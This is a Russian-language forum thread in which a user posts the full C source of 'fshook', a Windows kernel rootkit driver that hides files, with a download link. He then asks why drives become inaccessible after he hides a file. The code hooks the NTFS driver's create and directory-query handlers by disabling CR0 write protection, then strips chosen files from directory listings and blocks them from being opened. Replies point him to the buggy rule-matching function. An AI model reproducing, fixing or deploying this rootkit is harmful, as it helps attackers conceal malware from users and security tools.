проблема с использованием fshook от Cr4sh!

vanilly_cpp · 10 янв 2008

Скачал с http://hellknights.void.ru/ написанный руткит для сокрытия файлов "fshook by Cr4sh".
http://hellknights.void.ru/releases/fshook.rar

Код (Text):

#include <stdio.h>

#include <ntddk.h>

#include "debug.h"

#include "undocnt.h"

#include "drvcomm.h"

extern PVOID IoDriverObjectType;

PPROTECT_RULE PrtFindRule(PWSTR object);

PDRIVER_OBJECT pTargetDrvObj;

UNICODE_STRING dos_dev_name, dev_name;

typedef NTSTATUS (__stdcall * IRP_FUNC)(

PDEVICE_OBJECT DeviceObject, PIRP Irp

);

KMUTEX RulesMutex;

IRP_FUNC OldCreate;

IRP_FUNC OldDirectoryControl;

//--------------------------------------------------------------------------------------

NTSTATUS Process_Dir(wchar_t *pDirName, PFILE_DIRECTORY_INFORMATION pInf)

{

NTSTATUS ns = STATUS_SUCCESS;

wchar_t FullPath[255];

PFILE_DIRECTORY_INFORMATION pPrevFileInfo, pFileInfo = pInf;

while (pFileInfo)

{

RtlZeroMemory(FullPath, sizeof(FullPath));

wcscpy(FullPath, pDirName);

if (pDirName[wcslen(pDirName) - 1] != '\\')

wcscat(FullPath, L"\\");

wcsncat(FullPath, pFileInfo->FileName,

min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

if (PrtFindRule(FullPath))

{

DbgMsg("%S - PROTECTED\n", FullPath);

if (pPrevFileInfo)

{

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;

} else {

*(PULONG)pInf = 0;

return ns;

}

} else {

if (pFileInfo->NextEntryOffset)

{

*(PULONG)pInf += pFileInfo->NextEntryOffset;

} else {

ns = STATUS_NO_SUCH_FILE;

}

}

}

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo = pFileInfo;

*(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;

} else {

pFileInfo = NULL;

}

}

return ns;

}

//--------------------------------------------------------------------------------------

NTSTATUS Process_Full(wchar_t *pDirName, PFILE_FULL_DIRECTORY_INFORMATION pInf)

{

NTSTATUS ns = STATUS_SUCCESS;

wchar_t FullPath[255];

PFILE_FULL_DIRECTORY_INFORMATION pPrevFileInfo, pFileInfo = pInf;

while (pFileInfo)

{

RtlZeroMemory(FullPath, sizeof(FullPath));

wcscpy(FullPath, pDirName);

if (pDirName[wcslen(pDirName) - 1] != '\\')

wcscat(FullPath, L"\\");

wcsncat(FullPath, pFileInfo->FileName,

min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

if (PrtFindRule(FullPath))

{

DbgMsg("%S - PROTECTED\n", FullPath);

if (pPrevFileInfo)

{

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;

} else {

*(PULONG)pInf = 0;

return ns;

}

} else {

if (pFileInfo->NextEntryOffset)

{

*(PULONG)pInf += pFileInfo->NextEntryOffset;

} else {

ns = STATUS_NO_SUCH_FILE;

}

}

}

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo = pFileInfo;

*(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;

} else {

pFileInfo = NULL;

}

}

return ns;

}

//--------------------------------------------------------------------------------------

NTSTATUS Process_Both(wchar_t *pDirName, PFILE_BOTH_DIRECTORY_INFORMATION pInf)

{

NTSTATUS ns = STATUS_SUCCESS;

wchar_t FullPath[255];

PFILE_BOTH_DIRECTORY_INFORMATION pPrevFileInfo, pFileInfo = pInf;

while (pFileInfo)

{

RtlZeroMemory(FullPath, sizeof(FullPath));

wcscpy(FullPath, pDirName);

if (pDirName[wcslen(pDirName) - 1] != '\\')

wcscat(FullPath, L"\\");

wcsncat(FullPath, pFileInfo->FileName,

min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

if (PrtFindRule(FullPath))

{

DbgMsg("%S - PROTECTED\n", FullPath);

if (pPrevFileInfo)

{

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;

} else {

*(PULONG)pInf = 0;

return ns;

}

} else {

if (pFileInfo->NextEntryOffset)

{

*(PULONG)pInf += pFileInfo->NextEntryOffset;

} else {

ns = STATUS_NO_SUCH_FILE;

}

}

}

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo = pFileInfo;

*(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;

} else {

pFileInfo = NULL;

}

}

return ns;

}

//--------------------------------------------------------------------------------------

NTSTATUS Process_Names(wchar_t *pDirName, PFILE_NAMES_INFORMATION pInf)

{

NTSTATUS ns = STATUS_SUCCESS;

wchar_t FullPath[255];

PFILE_NAMES_INFORMATION pPrevFileInfo, pFileInfo = pInf;

while (pFileInfo)

{

RtlZeroMemory(FullPath, sizeof(FullPath));

wcscpy(FullPath, pDirName);

if (pDirName[wcslen(pDirName) - 1] != '\\')

wcscat(FullPath, L"\\");

wcsncat(FullPath, pFileInfo->FileName,

min(pFileInfo->FileNameLength / 2, sizeof(FullPath) - wcslen(FullPath)));

if (PrtFindRule(FullPath))

{

DbgMsg("%S - PROTECTED\n", FullPath);

if (pPrevFileInfo)

{

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo->NextEntryOffset += pFileInfo->NextEntryOffset;

} else {

*(PULONG)pInf = 0;

return ns;

}

} else {

if (pFileInfo->NextEntryOffset)

{

*(PULONG)pInf += pFileInfo->NextEntryOffset;

} else {

ns = STATUS_NO_SUCH_FILE;

}

}

}

if (pFileInfo->NextEntryOffset)

{

pPrevFileInfo = pFileInfo;

*(ULONG*)&pFileInfo += pFileInfo->NextEntryOffset;

} else {

pFileInfo = NULL;

}

}

return ns;

}

//--------------------------------------------------------------------------------------

NTSTATUS __stdcall NewCreate(PDEVICE_OBJECT DeviceObject, PIRP Irp)

{

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);

if (MmIsAddressValid(stack->FileObject))

{

if (MmIsAddressValid(stack->FileObject->FileName.Buffer))

{

DbgMsg("IRP_MJ_CREATE : %S\n", stack->FileObject->FileName.Buffer);

if (PrtFindRule(stack->FileObject->FileName.Buffer))

return STATUS_UNSUCCESSFUL;

}

}

return OldCreate(DeviceObject, Irp);

}

//--------------------------------------------------------------------------------------

NTSTATUS __stdcall NewDirectoryControl(PDEVICE_OBJECT DeviceObject, PIRP Irp)

{

NTSTATUS ns;

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);

PQUERY_DIRECTORY QueryDir = (PQUERY_DIRECTORY)&stack->Parameters;

FILE_INFORMATION_CLASS FileInformationClass = QueryDir->FileInformationClass;

wchar_t DirName[255];

if (stack->MinorFunction == IRP_MN_QUERY_DIRECTORY)

{

if (MmIsAddressValid(stack->FileObject))

{

if (MmIsAddressValid(stack->FileObject->FileName.Buffer))

{

DbgMsg("IRP_MJ_DIRECTORY_CONTROL : %S (FileInformationClass: %d)\n",

stack->FileObject->FileName.Buffer, FileInformationClass);

wcsncpy(DirName, stack->FileObject->FileName.Buffer,

min(sizeof(DirName), stack->FileObject->FileName.Length));

ns = OldDirectoryControl(DeviceObject, Irp);

if (ns == STATUS_SUCCESS)

{

switch (FileInformationClass)

{

case FileDirectoryInformation:

return Process_Dir(DirName, (PFILE_DIRECTORY_INFORMATION)Irp->UserBuffer);

case FileFullDirectoryInformation:

return Process_Full(DirName, (PFILE_FULL_DIRECTORY_INFORMATION)Irp->UserBuffer);

case FileBothDirectoryInformation:

return Process_Both(DirName, (PFILE_BOTH_DIRECTORY_INFORMATION)Irp->UserBuffer);

case FileNamesInformation:

return Process_Names(DirName, (PFILE_NAMES_INFORMATION)Irp->UserBuffer);

}

}

return ns;

}

}

}

return OldDirectoryControl(DeviceObject, Irp);

}

//--------------------------------------------------------------------------------------

// compare two strings from the end (returns number of equal characters)

unsigned int r_wcsncmp(wchar_t *str1, wchar_t *str2)

{

unsigned int i, len1 = wcslen(str1), len2 = wcslen(str2);

for (i = 0; i < min(len1, len2); i++)

{

if (str1[len1-i] != str2[len2-i])

return 0;

}

return i;

}

//--------------------------------------------------------------------------------------

// first and last rules in list

PPROTECT_RULE r_first = NULL, r_last = NULL;

// find rule by type and object name

PPROTECT_RULE PrtFindRule(PWSTR object)

{

PPROTECT_RULE r = r_first;

NTSTATUS ns = KeWaitForMutexObject(&RulesMutex, Executive, KernelMode, FALSE, NULL);

if (!NT_SUCCESS(ns))

{

DbgMsg("KeWaitForMutexObject() ERROR : 0x%.8x\n", ns);

return NULL;

}

__try

{

while (r)

{

if (r_wcsncmp(r->name, object))

__leave;

r = (PPROTECT_RULE)r->r_next;

}

r = NULL;

}

__finally

{

KeReleaseMutex(&RulesMutex, FALSE);

}

return r;

}

//--------------------------------------------------------------------------------------

// delete some rule

BOOLEAN PrtDelRule(PWSTR object)

{

BOOLEAN bRet = FALSE;

PPROTECT_RULE r;

NTSTATUS ns = KeWaitForMutexObject(&RulesMutex, Executive, KernelMode, FALSE, NULL);

if (!NT_SUCCESS(ns))

{

DbgMsg("KeWaitForMutexObject() ERROR : 0x%.8x\n", ns);

return bRet;

}

__try

{

r = PrtFindRule(object);

if (r == NULL)

{

DbgMsg("PrtDelRule() : Rule not found\n");

__leave;

}

if (r->r_prev)

((PPROTECT_RULE)(r->r_prev))->r_next = r->r_next;

if (r->r_next)

((PPROTECT_RULE)(r->r_next))->r_prev = r->r_prev;

if (r_first == r)

r_first = (PPROTECT_RULE)r->r_next;

if (r_last == r)

r_last = (PPROTECT_RULE)r->r_prev;

DbgMsg("PrtDelRule() : 0x%.8x deleted! (object name: %S)\n", object);

ExFreePool(r);

bRet = TRUE;

}

__finally

{

KeReleaseMutex(&RulesMutex, FALSE);

}

return bRet;

}

//--------------------------------------------------------------------------------------

// create new rule

BOOLEAN PrtAddRule(PWSTR object)

{

BOOLEAN bRet = FALSE;

PPROTECT_RULE r;

NTSTATUS ns = KeWaitForMutexObject(&RulesMutex, Executive, KernelMode, FALSE, NULL);

if (!NT_SUCCESS(ns))

{

DbgMsg("KeWaitForMutexObject() ERROR : 0x%.8x\n", ns);

return FALSE;

}

__try

{

// allready exists...

r = PrtFindRule(object);

if (r)

{

DbgMsg("PrtAddRule() : Allready exists\n");

__leave;

}

r = (PPROTECT_RULE)ExAllocatePool(NonPagedPool, sizeof(PROTECT_RULE));

if (r == NULL)

{

DbgMsg("ExAllocatePool() ERROR\n");

__leave;

}

RtlZeroMemory(r, sizeof(PROTECT_RULE));

wcsncpy(r->name, object, min(wcslen(object), 255));

if (r_last)

{

r_last->r_next = (ULONG)r;

r->r_prev = (ULONG)r_last;

r_last = r;

} else {

r_last = r_first = r;

}

DbgMsg("PrtAddRule() : Rule added! (object name: %S)\n", object);

bRet = TRUE;

}

__finally

{

KeReleaseMutex(&RulesMutex, FALSE);

}

return bRet;

}

//--------------------------------------------------------------------------------------

// DriverDispath

NTSTATUS DeviceControlRoutine(PDEVICE_OBJECT DeviceObject, PIRP Irp)

{

PIO_STACK_LOCATION stack;

NTSTATUS ns = STATUS_SUCCESS;

ULONG code, ret = 0;

PIRP notify_irp;

PREQUEST_BUFFER buf_req, buf_res;

Irp->IoStatus.Status = ns;

Irp->IoStatus.Information = 0;

stack = IoGetCurrentIrpStackLocation(Irp);

if (stack->MajorFunction == IRP_MJ_DEVICE_CONTROL)

{

code = stack->Parameters.DeviceIoControl.IoControlCode;

buf_req = buf_res = (PREQUEST_BUFFER)Irp->AssociatedIrp.SystemBuffer;

DbgMsg("IRP_MJ_DEVICE_CONTROL : 0x%.8x\n", code);

Irp->IoStatus.Information = sizeof(REQUEST_BUFFER);

switch (code)

{

case IOCTL_PROTECT_FILE:

if (buf_req->protect_object.active)

{

buf_res->status = PrtAddRule(buf_req->protect_object.name);

} else {

buf_res->status = PrtDelRule(buf_req->protect_object.name);

}

break;

default:

ns = STATUS_INVALID_DEVICE_REQUEST;

buf_res->status = 0;

Irp->IoStatus.Information = 0;

break;

}

}

if (ns != STATUS_PENDING)

{

IoCompleteRequest(Irp, IO_NO_INCREMENT);

Irp->IoStatus.Status = ns;

}

return ns;

}

//--------------------------------------------------------------------------------------

// unload function

NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)

{

DbgMsg("DriverUnload()\n");

__asm

{

cli

mov eax,cr0

and eax,not 000010000h

mov cr0,eax

}

InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_CREATE], (ULONG)OldCreate);

InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_DIRECTORY_CONTROL], (ULONG)OldDirectoryControl);

__asm

{

mov eax,cr0

or eax,000010000h

mov cr0,eax

sti

}

DbgMsg("IRP_MJ_CREATE: Restored to 0x%.8x\n", OldCreate);

DbgMsg("IRP_MJ_DIRECTORY_CONTROL: Restored to 0x%.8x\n", OldDirectoryControl);

IoDeleteDevice(DriverObject->DeviceObject);

IoDeleteSymbolicLink(&dos_dev_name);

return STATUS_SUCCESS;

}

//--------------------------------------------------------------------------------------

// main driver function

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,

IN PUNICODE_STRING RegistryPath

)

{

NTSTATUS ns = STATUS_SUCCESS;

UNICODE_STRING DevName;

wchar_t wc_dev_name[512], wc_dos_dev_name[512];

PDEVICE_OBJECT dev_obj;

DbgMsg("DriverEntry()\n");

DriverObject->DriverUnload = DriverUnload;

swprintf(wc_dev_name, L"\\Device\\%s", DEVICE_NAME);

swprintf(wc_dos_dev_name, L"\\DosDevices\\%s", DEVICE_NAME);

RtlInitUnicodeString(&dev_name, wc_dev_name);

RtlInitUnicodeString(&dos_dev_name, wc_dos_dev_name);

ns = IoCreateDevice(DriverObject, 0, &dev_name, FILE_DEVICE_UNKNOWN,

FILE_DEVICE_SECURE_OPEN, FALSE, &dev_obj);

if (NT_SUCCESS(ns))

{

DriverObject->MajorFunction[IRP_MJ_CREATE] =

DriverObject->MajorFunction[IRP_MJ_CLOSE] =

DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DeviceControlRoutine;

dev_obj->Flags |= DO_BUFFERED_IO;

IoDeleteSymbolicLink(&dos_dev_name);

ns = IoCreateSymbolicLink(&dos_dev_name, &dev_name);

if (!NT_SUCCESS(ns))

{

DbgMsg("IoCreateSymbolicLink() fails : 0x%.8x\n", ns);

IoDeleteDevice(DriverObject->DeviceObject);

return ns;

}

} else {

DbgMsg("IoCreateDevice() fails : 0x%.8x\n", ns);

return ns;

}

KeInitializeMutex(&RulesMutex, 0);

RtlInitUnicodeString(&DevName, L"\\FileSystem\\Ntfs");

ns = ObReferenceObjectByName(&DevName, OBJ_CASE_INSENSITIVE, NULL,

0, (POBJECT_TYPE)IoDriverObjectType, KernelMode, NULL, &pTargetDrvObj);

if (!NT_SUCCESS(ns))

{

DbgMsg("ObReferenceObjectByName() fails : 0x%.8x\n", ns);

return ns;

}

__asm

{

cli

mov eax,cr0

and eax,not 000010000h

mov cr0,eax

}

OldCreate = (IRP_FUNC)InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_CREATE], (ULONG)NewCreate);

OldDirectoryControl = (IRP_FUNC)InterlockedExchange((PLONG)&pTargetDrvObj->MajorFunction[IRP_MJ_DIRECTORY_CONTROL], (ULONG)NewDirectoryControl);

__asm

{

mov eax,cr0

or eax,000010000h

mov cr0,eax

sti

}

DbgMsg("IRP_MJ_CREATE: Old func 0x%.8x; New func 0x%.8x\n", OldCreate, NewCreate);

DbgMsg("IRP_MJ_DIRECTORY_CONTROL: Old func 0x%.8x; New func 0x%.8x\n", OldDirectoryControl, NewDirectoryControl);

return STATUS_SUCCESS;

}

//--------------------------------------------------------------------------------------

// EoF

У меня возникла такая проблема при его использовании:

- устанавливаю, и делаю все так, как написано в readme
- скрываю какой либо файл "control.exe dll_load.exe"

просле этого при обращении к какому либо диску вижу диалоговое окно
----------------------------------
Нет доступа к С:\
Параметр задан неверно
----------------------------------

если снимаю скрытие "control.exe dll_load.exe /d" то обрашение к дискам востонавливается

система xp sp2

Сам автор на вопрос по ICQ пока не ответил.

Может кто пользовался, или знает в чем проблема?

ECk · 10 янв 2008

смотри функцию поиска рулесов и будет тебе счастье (смотреть удобно в выньдебаге с отладкой по сорцу, иначе не поймешь)

k3internal · 11 янв 2008

Йопт. сорец есть. Айс есть. айсовый лоадер тоже есть.

vanilly_cpp · 11 янв 2008

просто вообще не разберался с дайверами фильтрами файловых систем!

думал сразу раз и заработает!
думал може у кого была такая же проблема!

ок, читаю разбераюсь!
Всем спасибо!

Войти или зарегистрироваться

проблема с использованием fshook от Cr4sh!

vanilly_cpp New Member

ECk Member

k3internal New Member

vanilly_cpp New Member

Войти или зарегистрироваться

проблема с использованием fshook от Cr4sh!

vanilly_cpp New Member

ECk Member

k3internal New Member

vanilly_cpp New Member

Быстрый поиск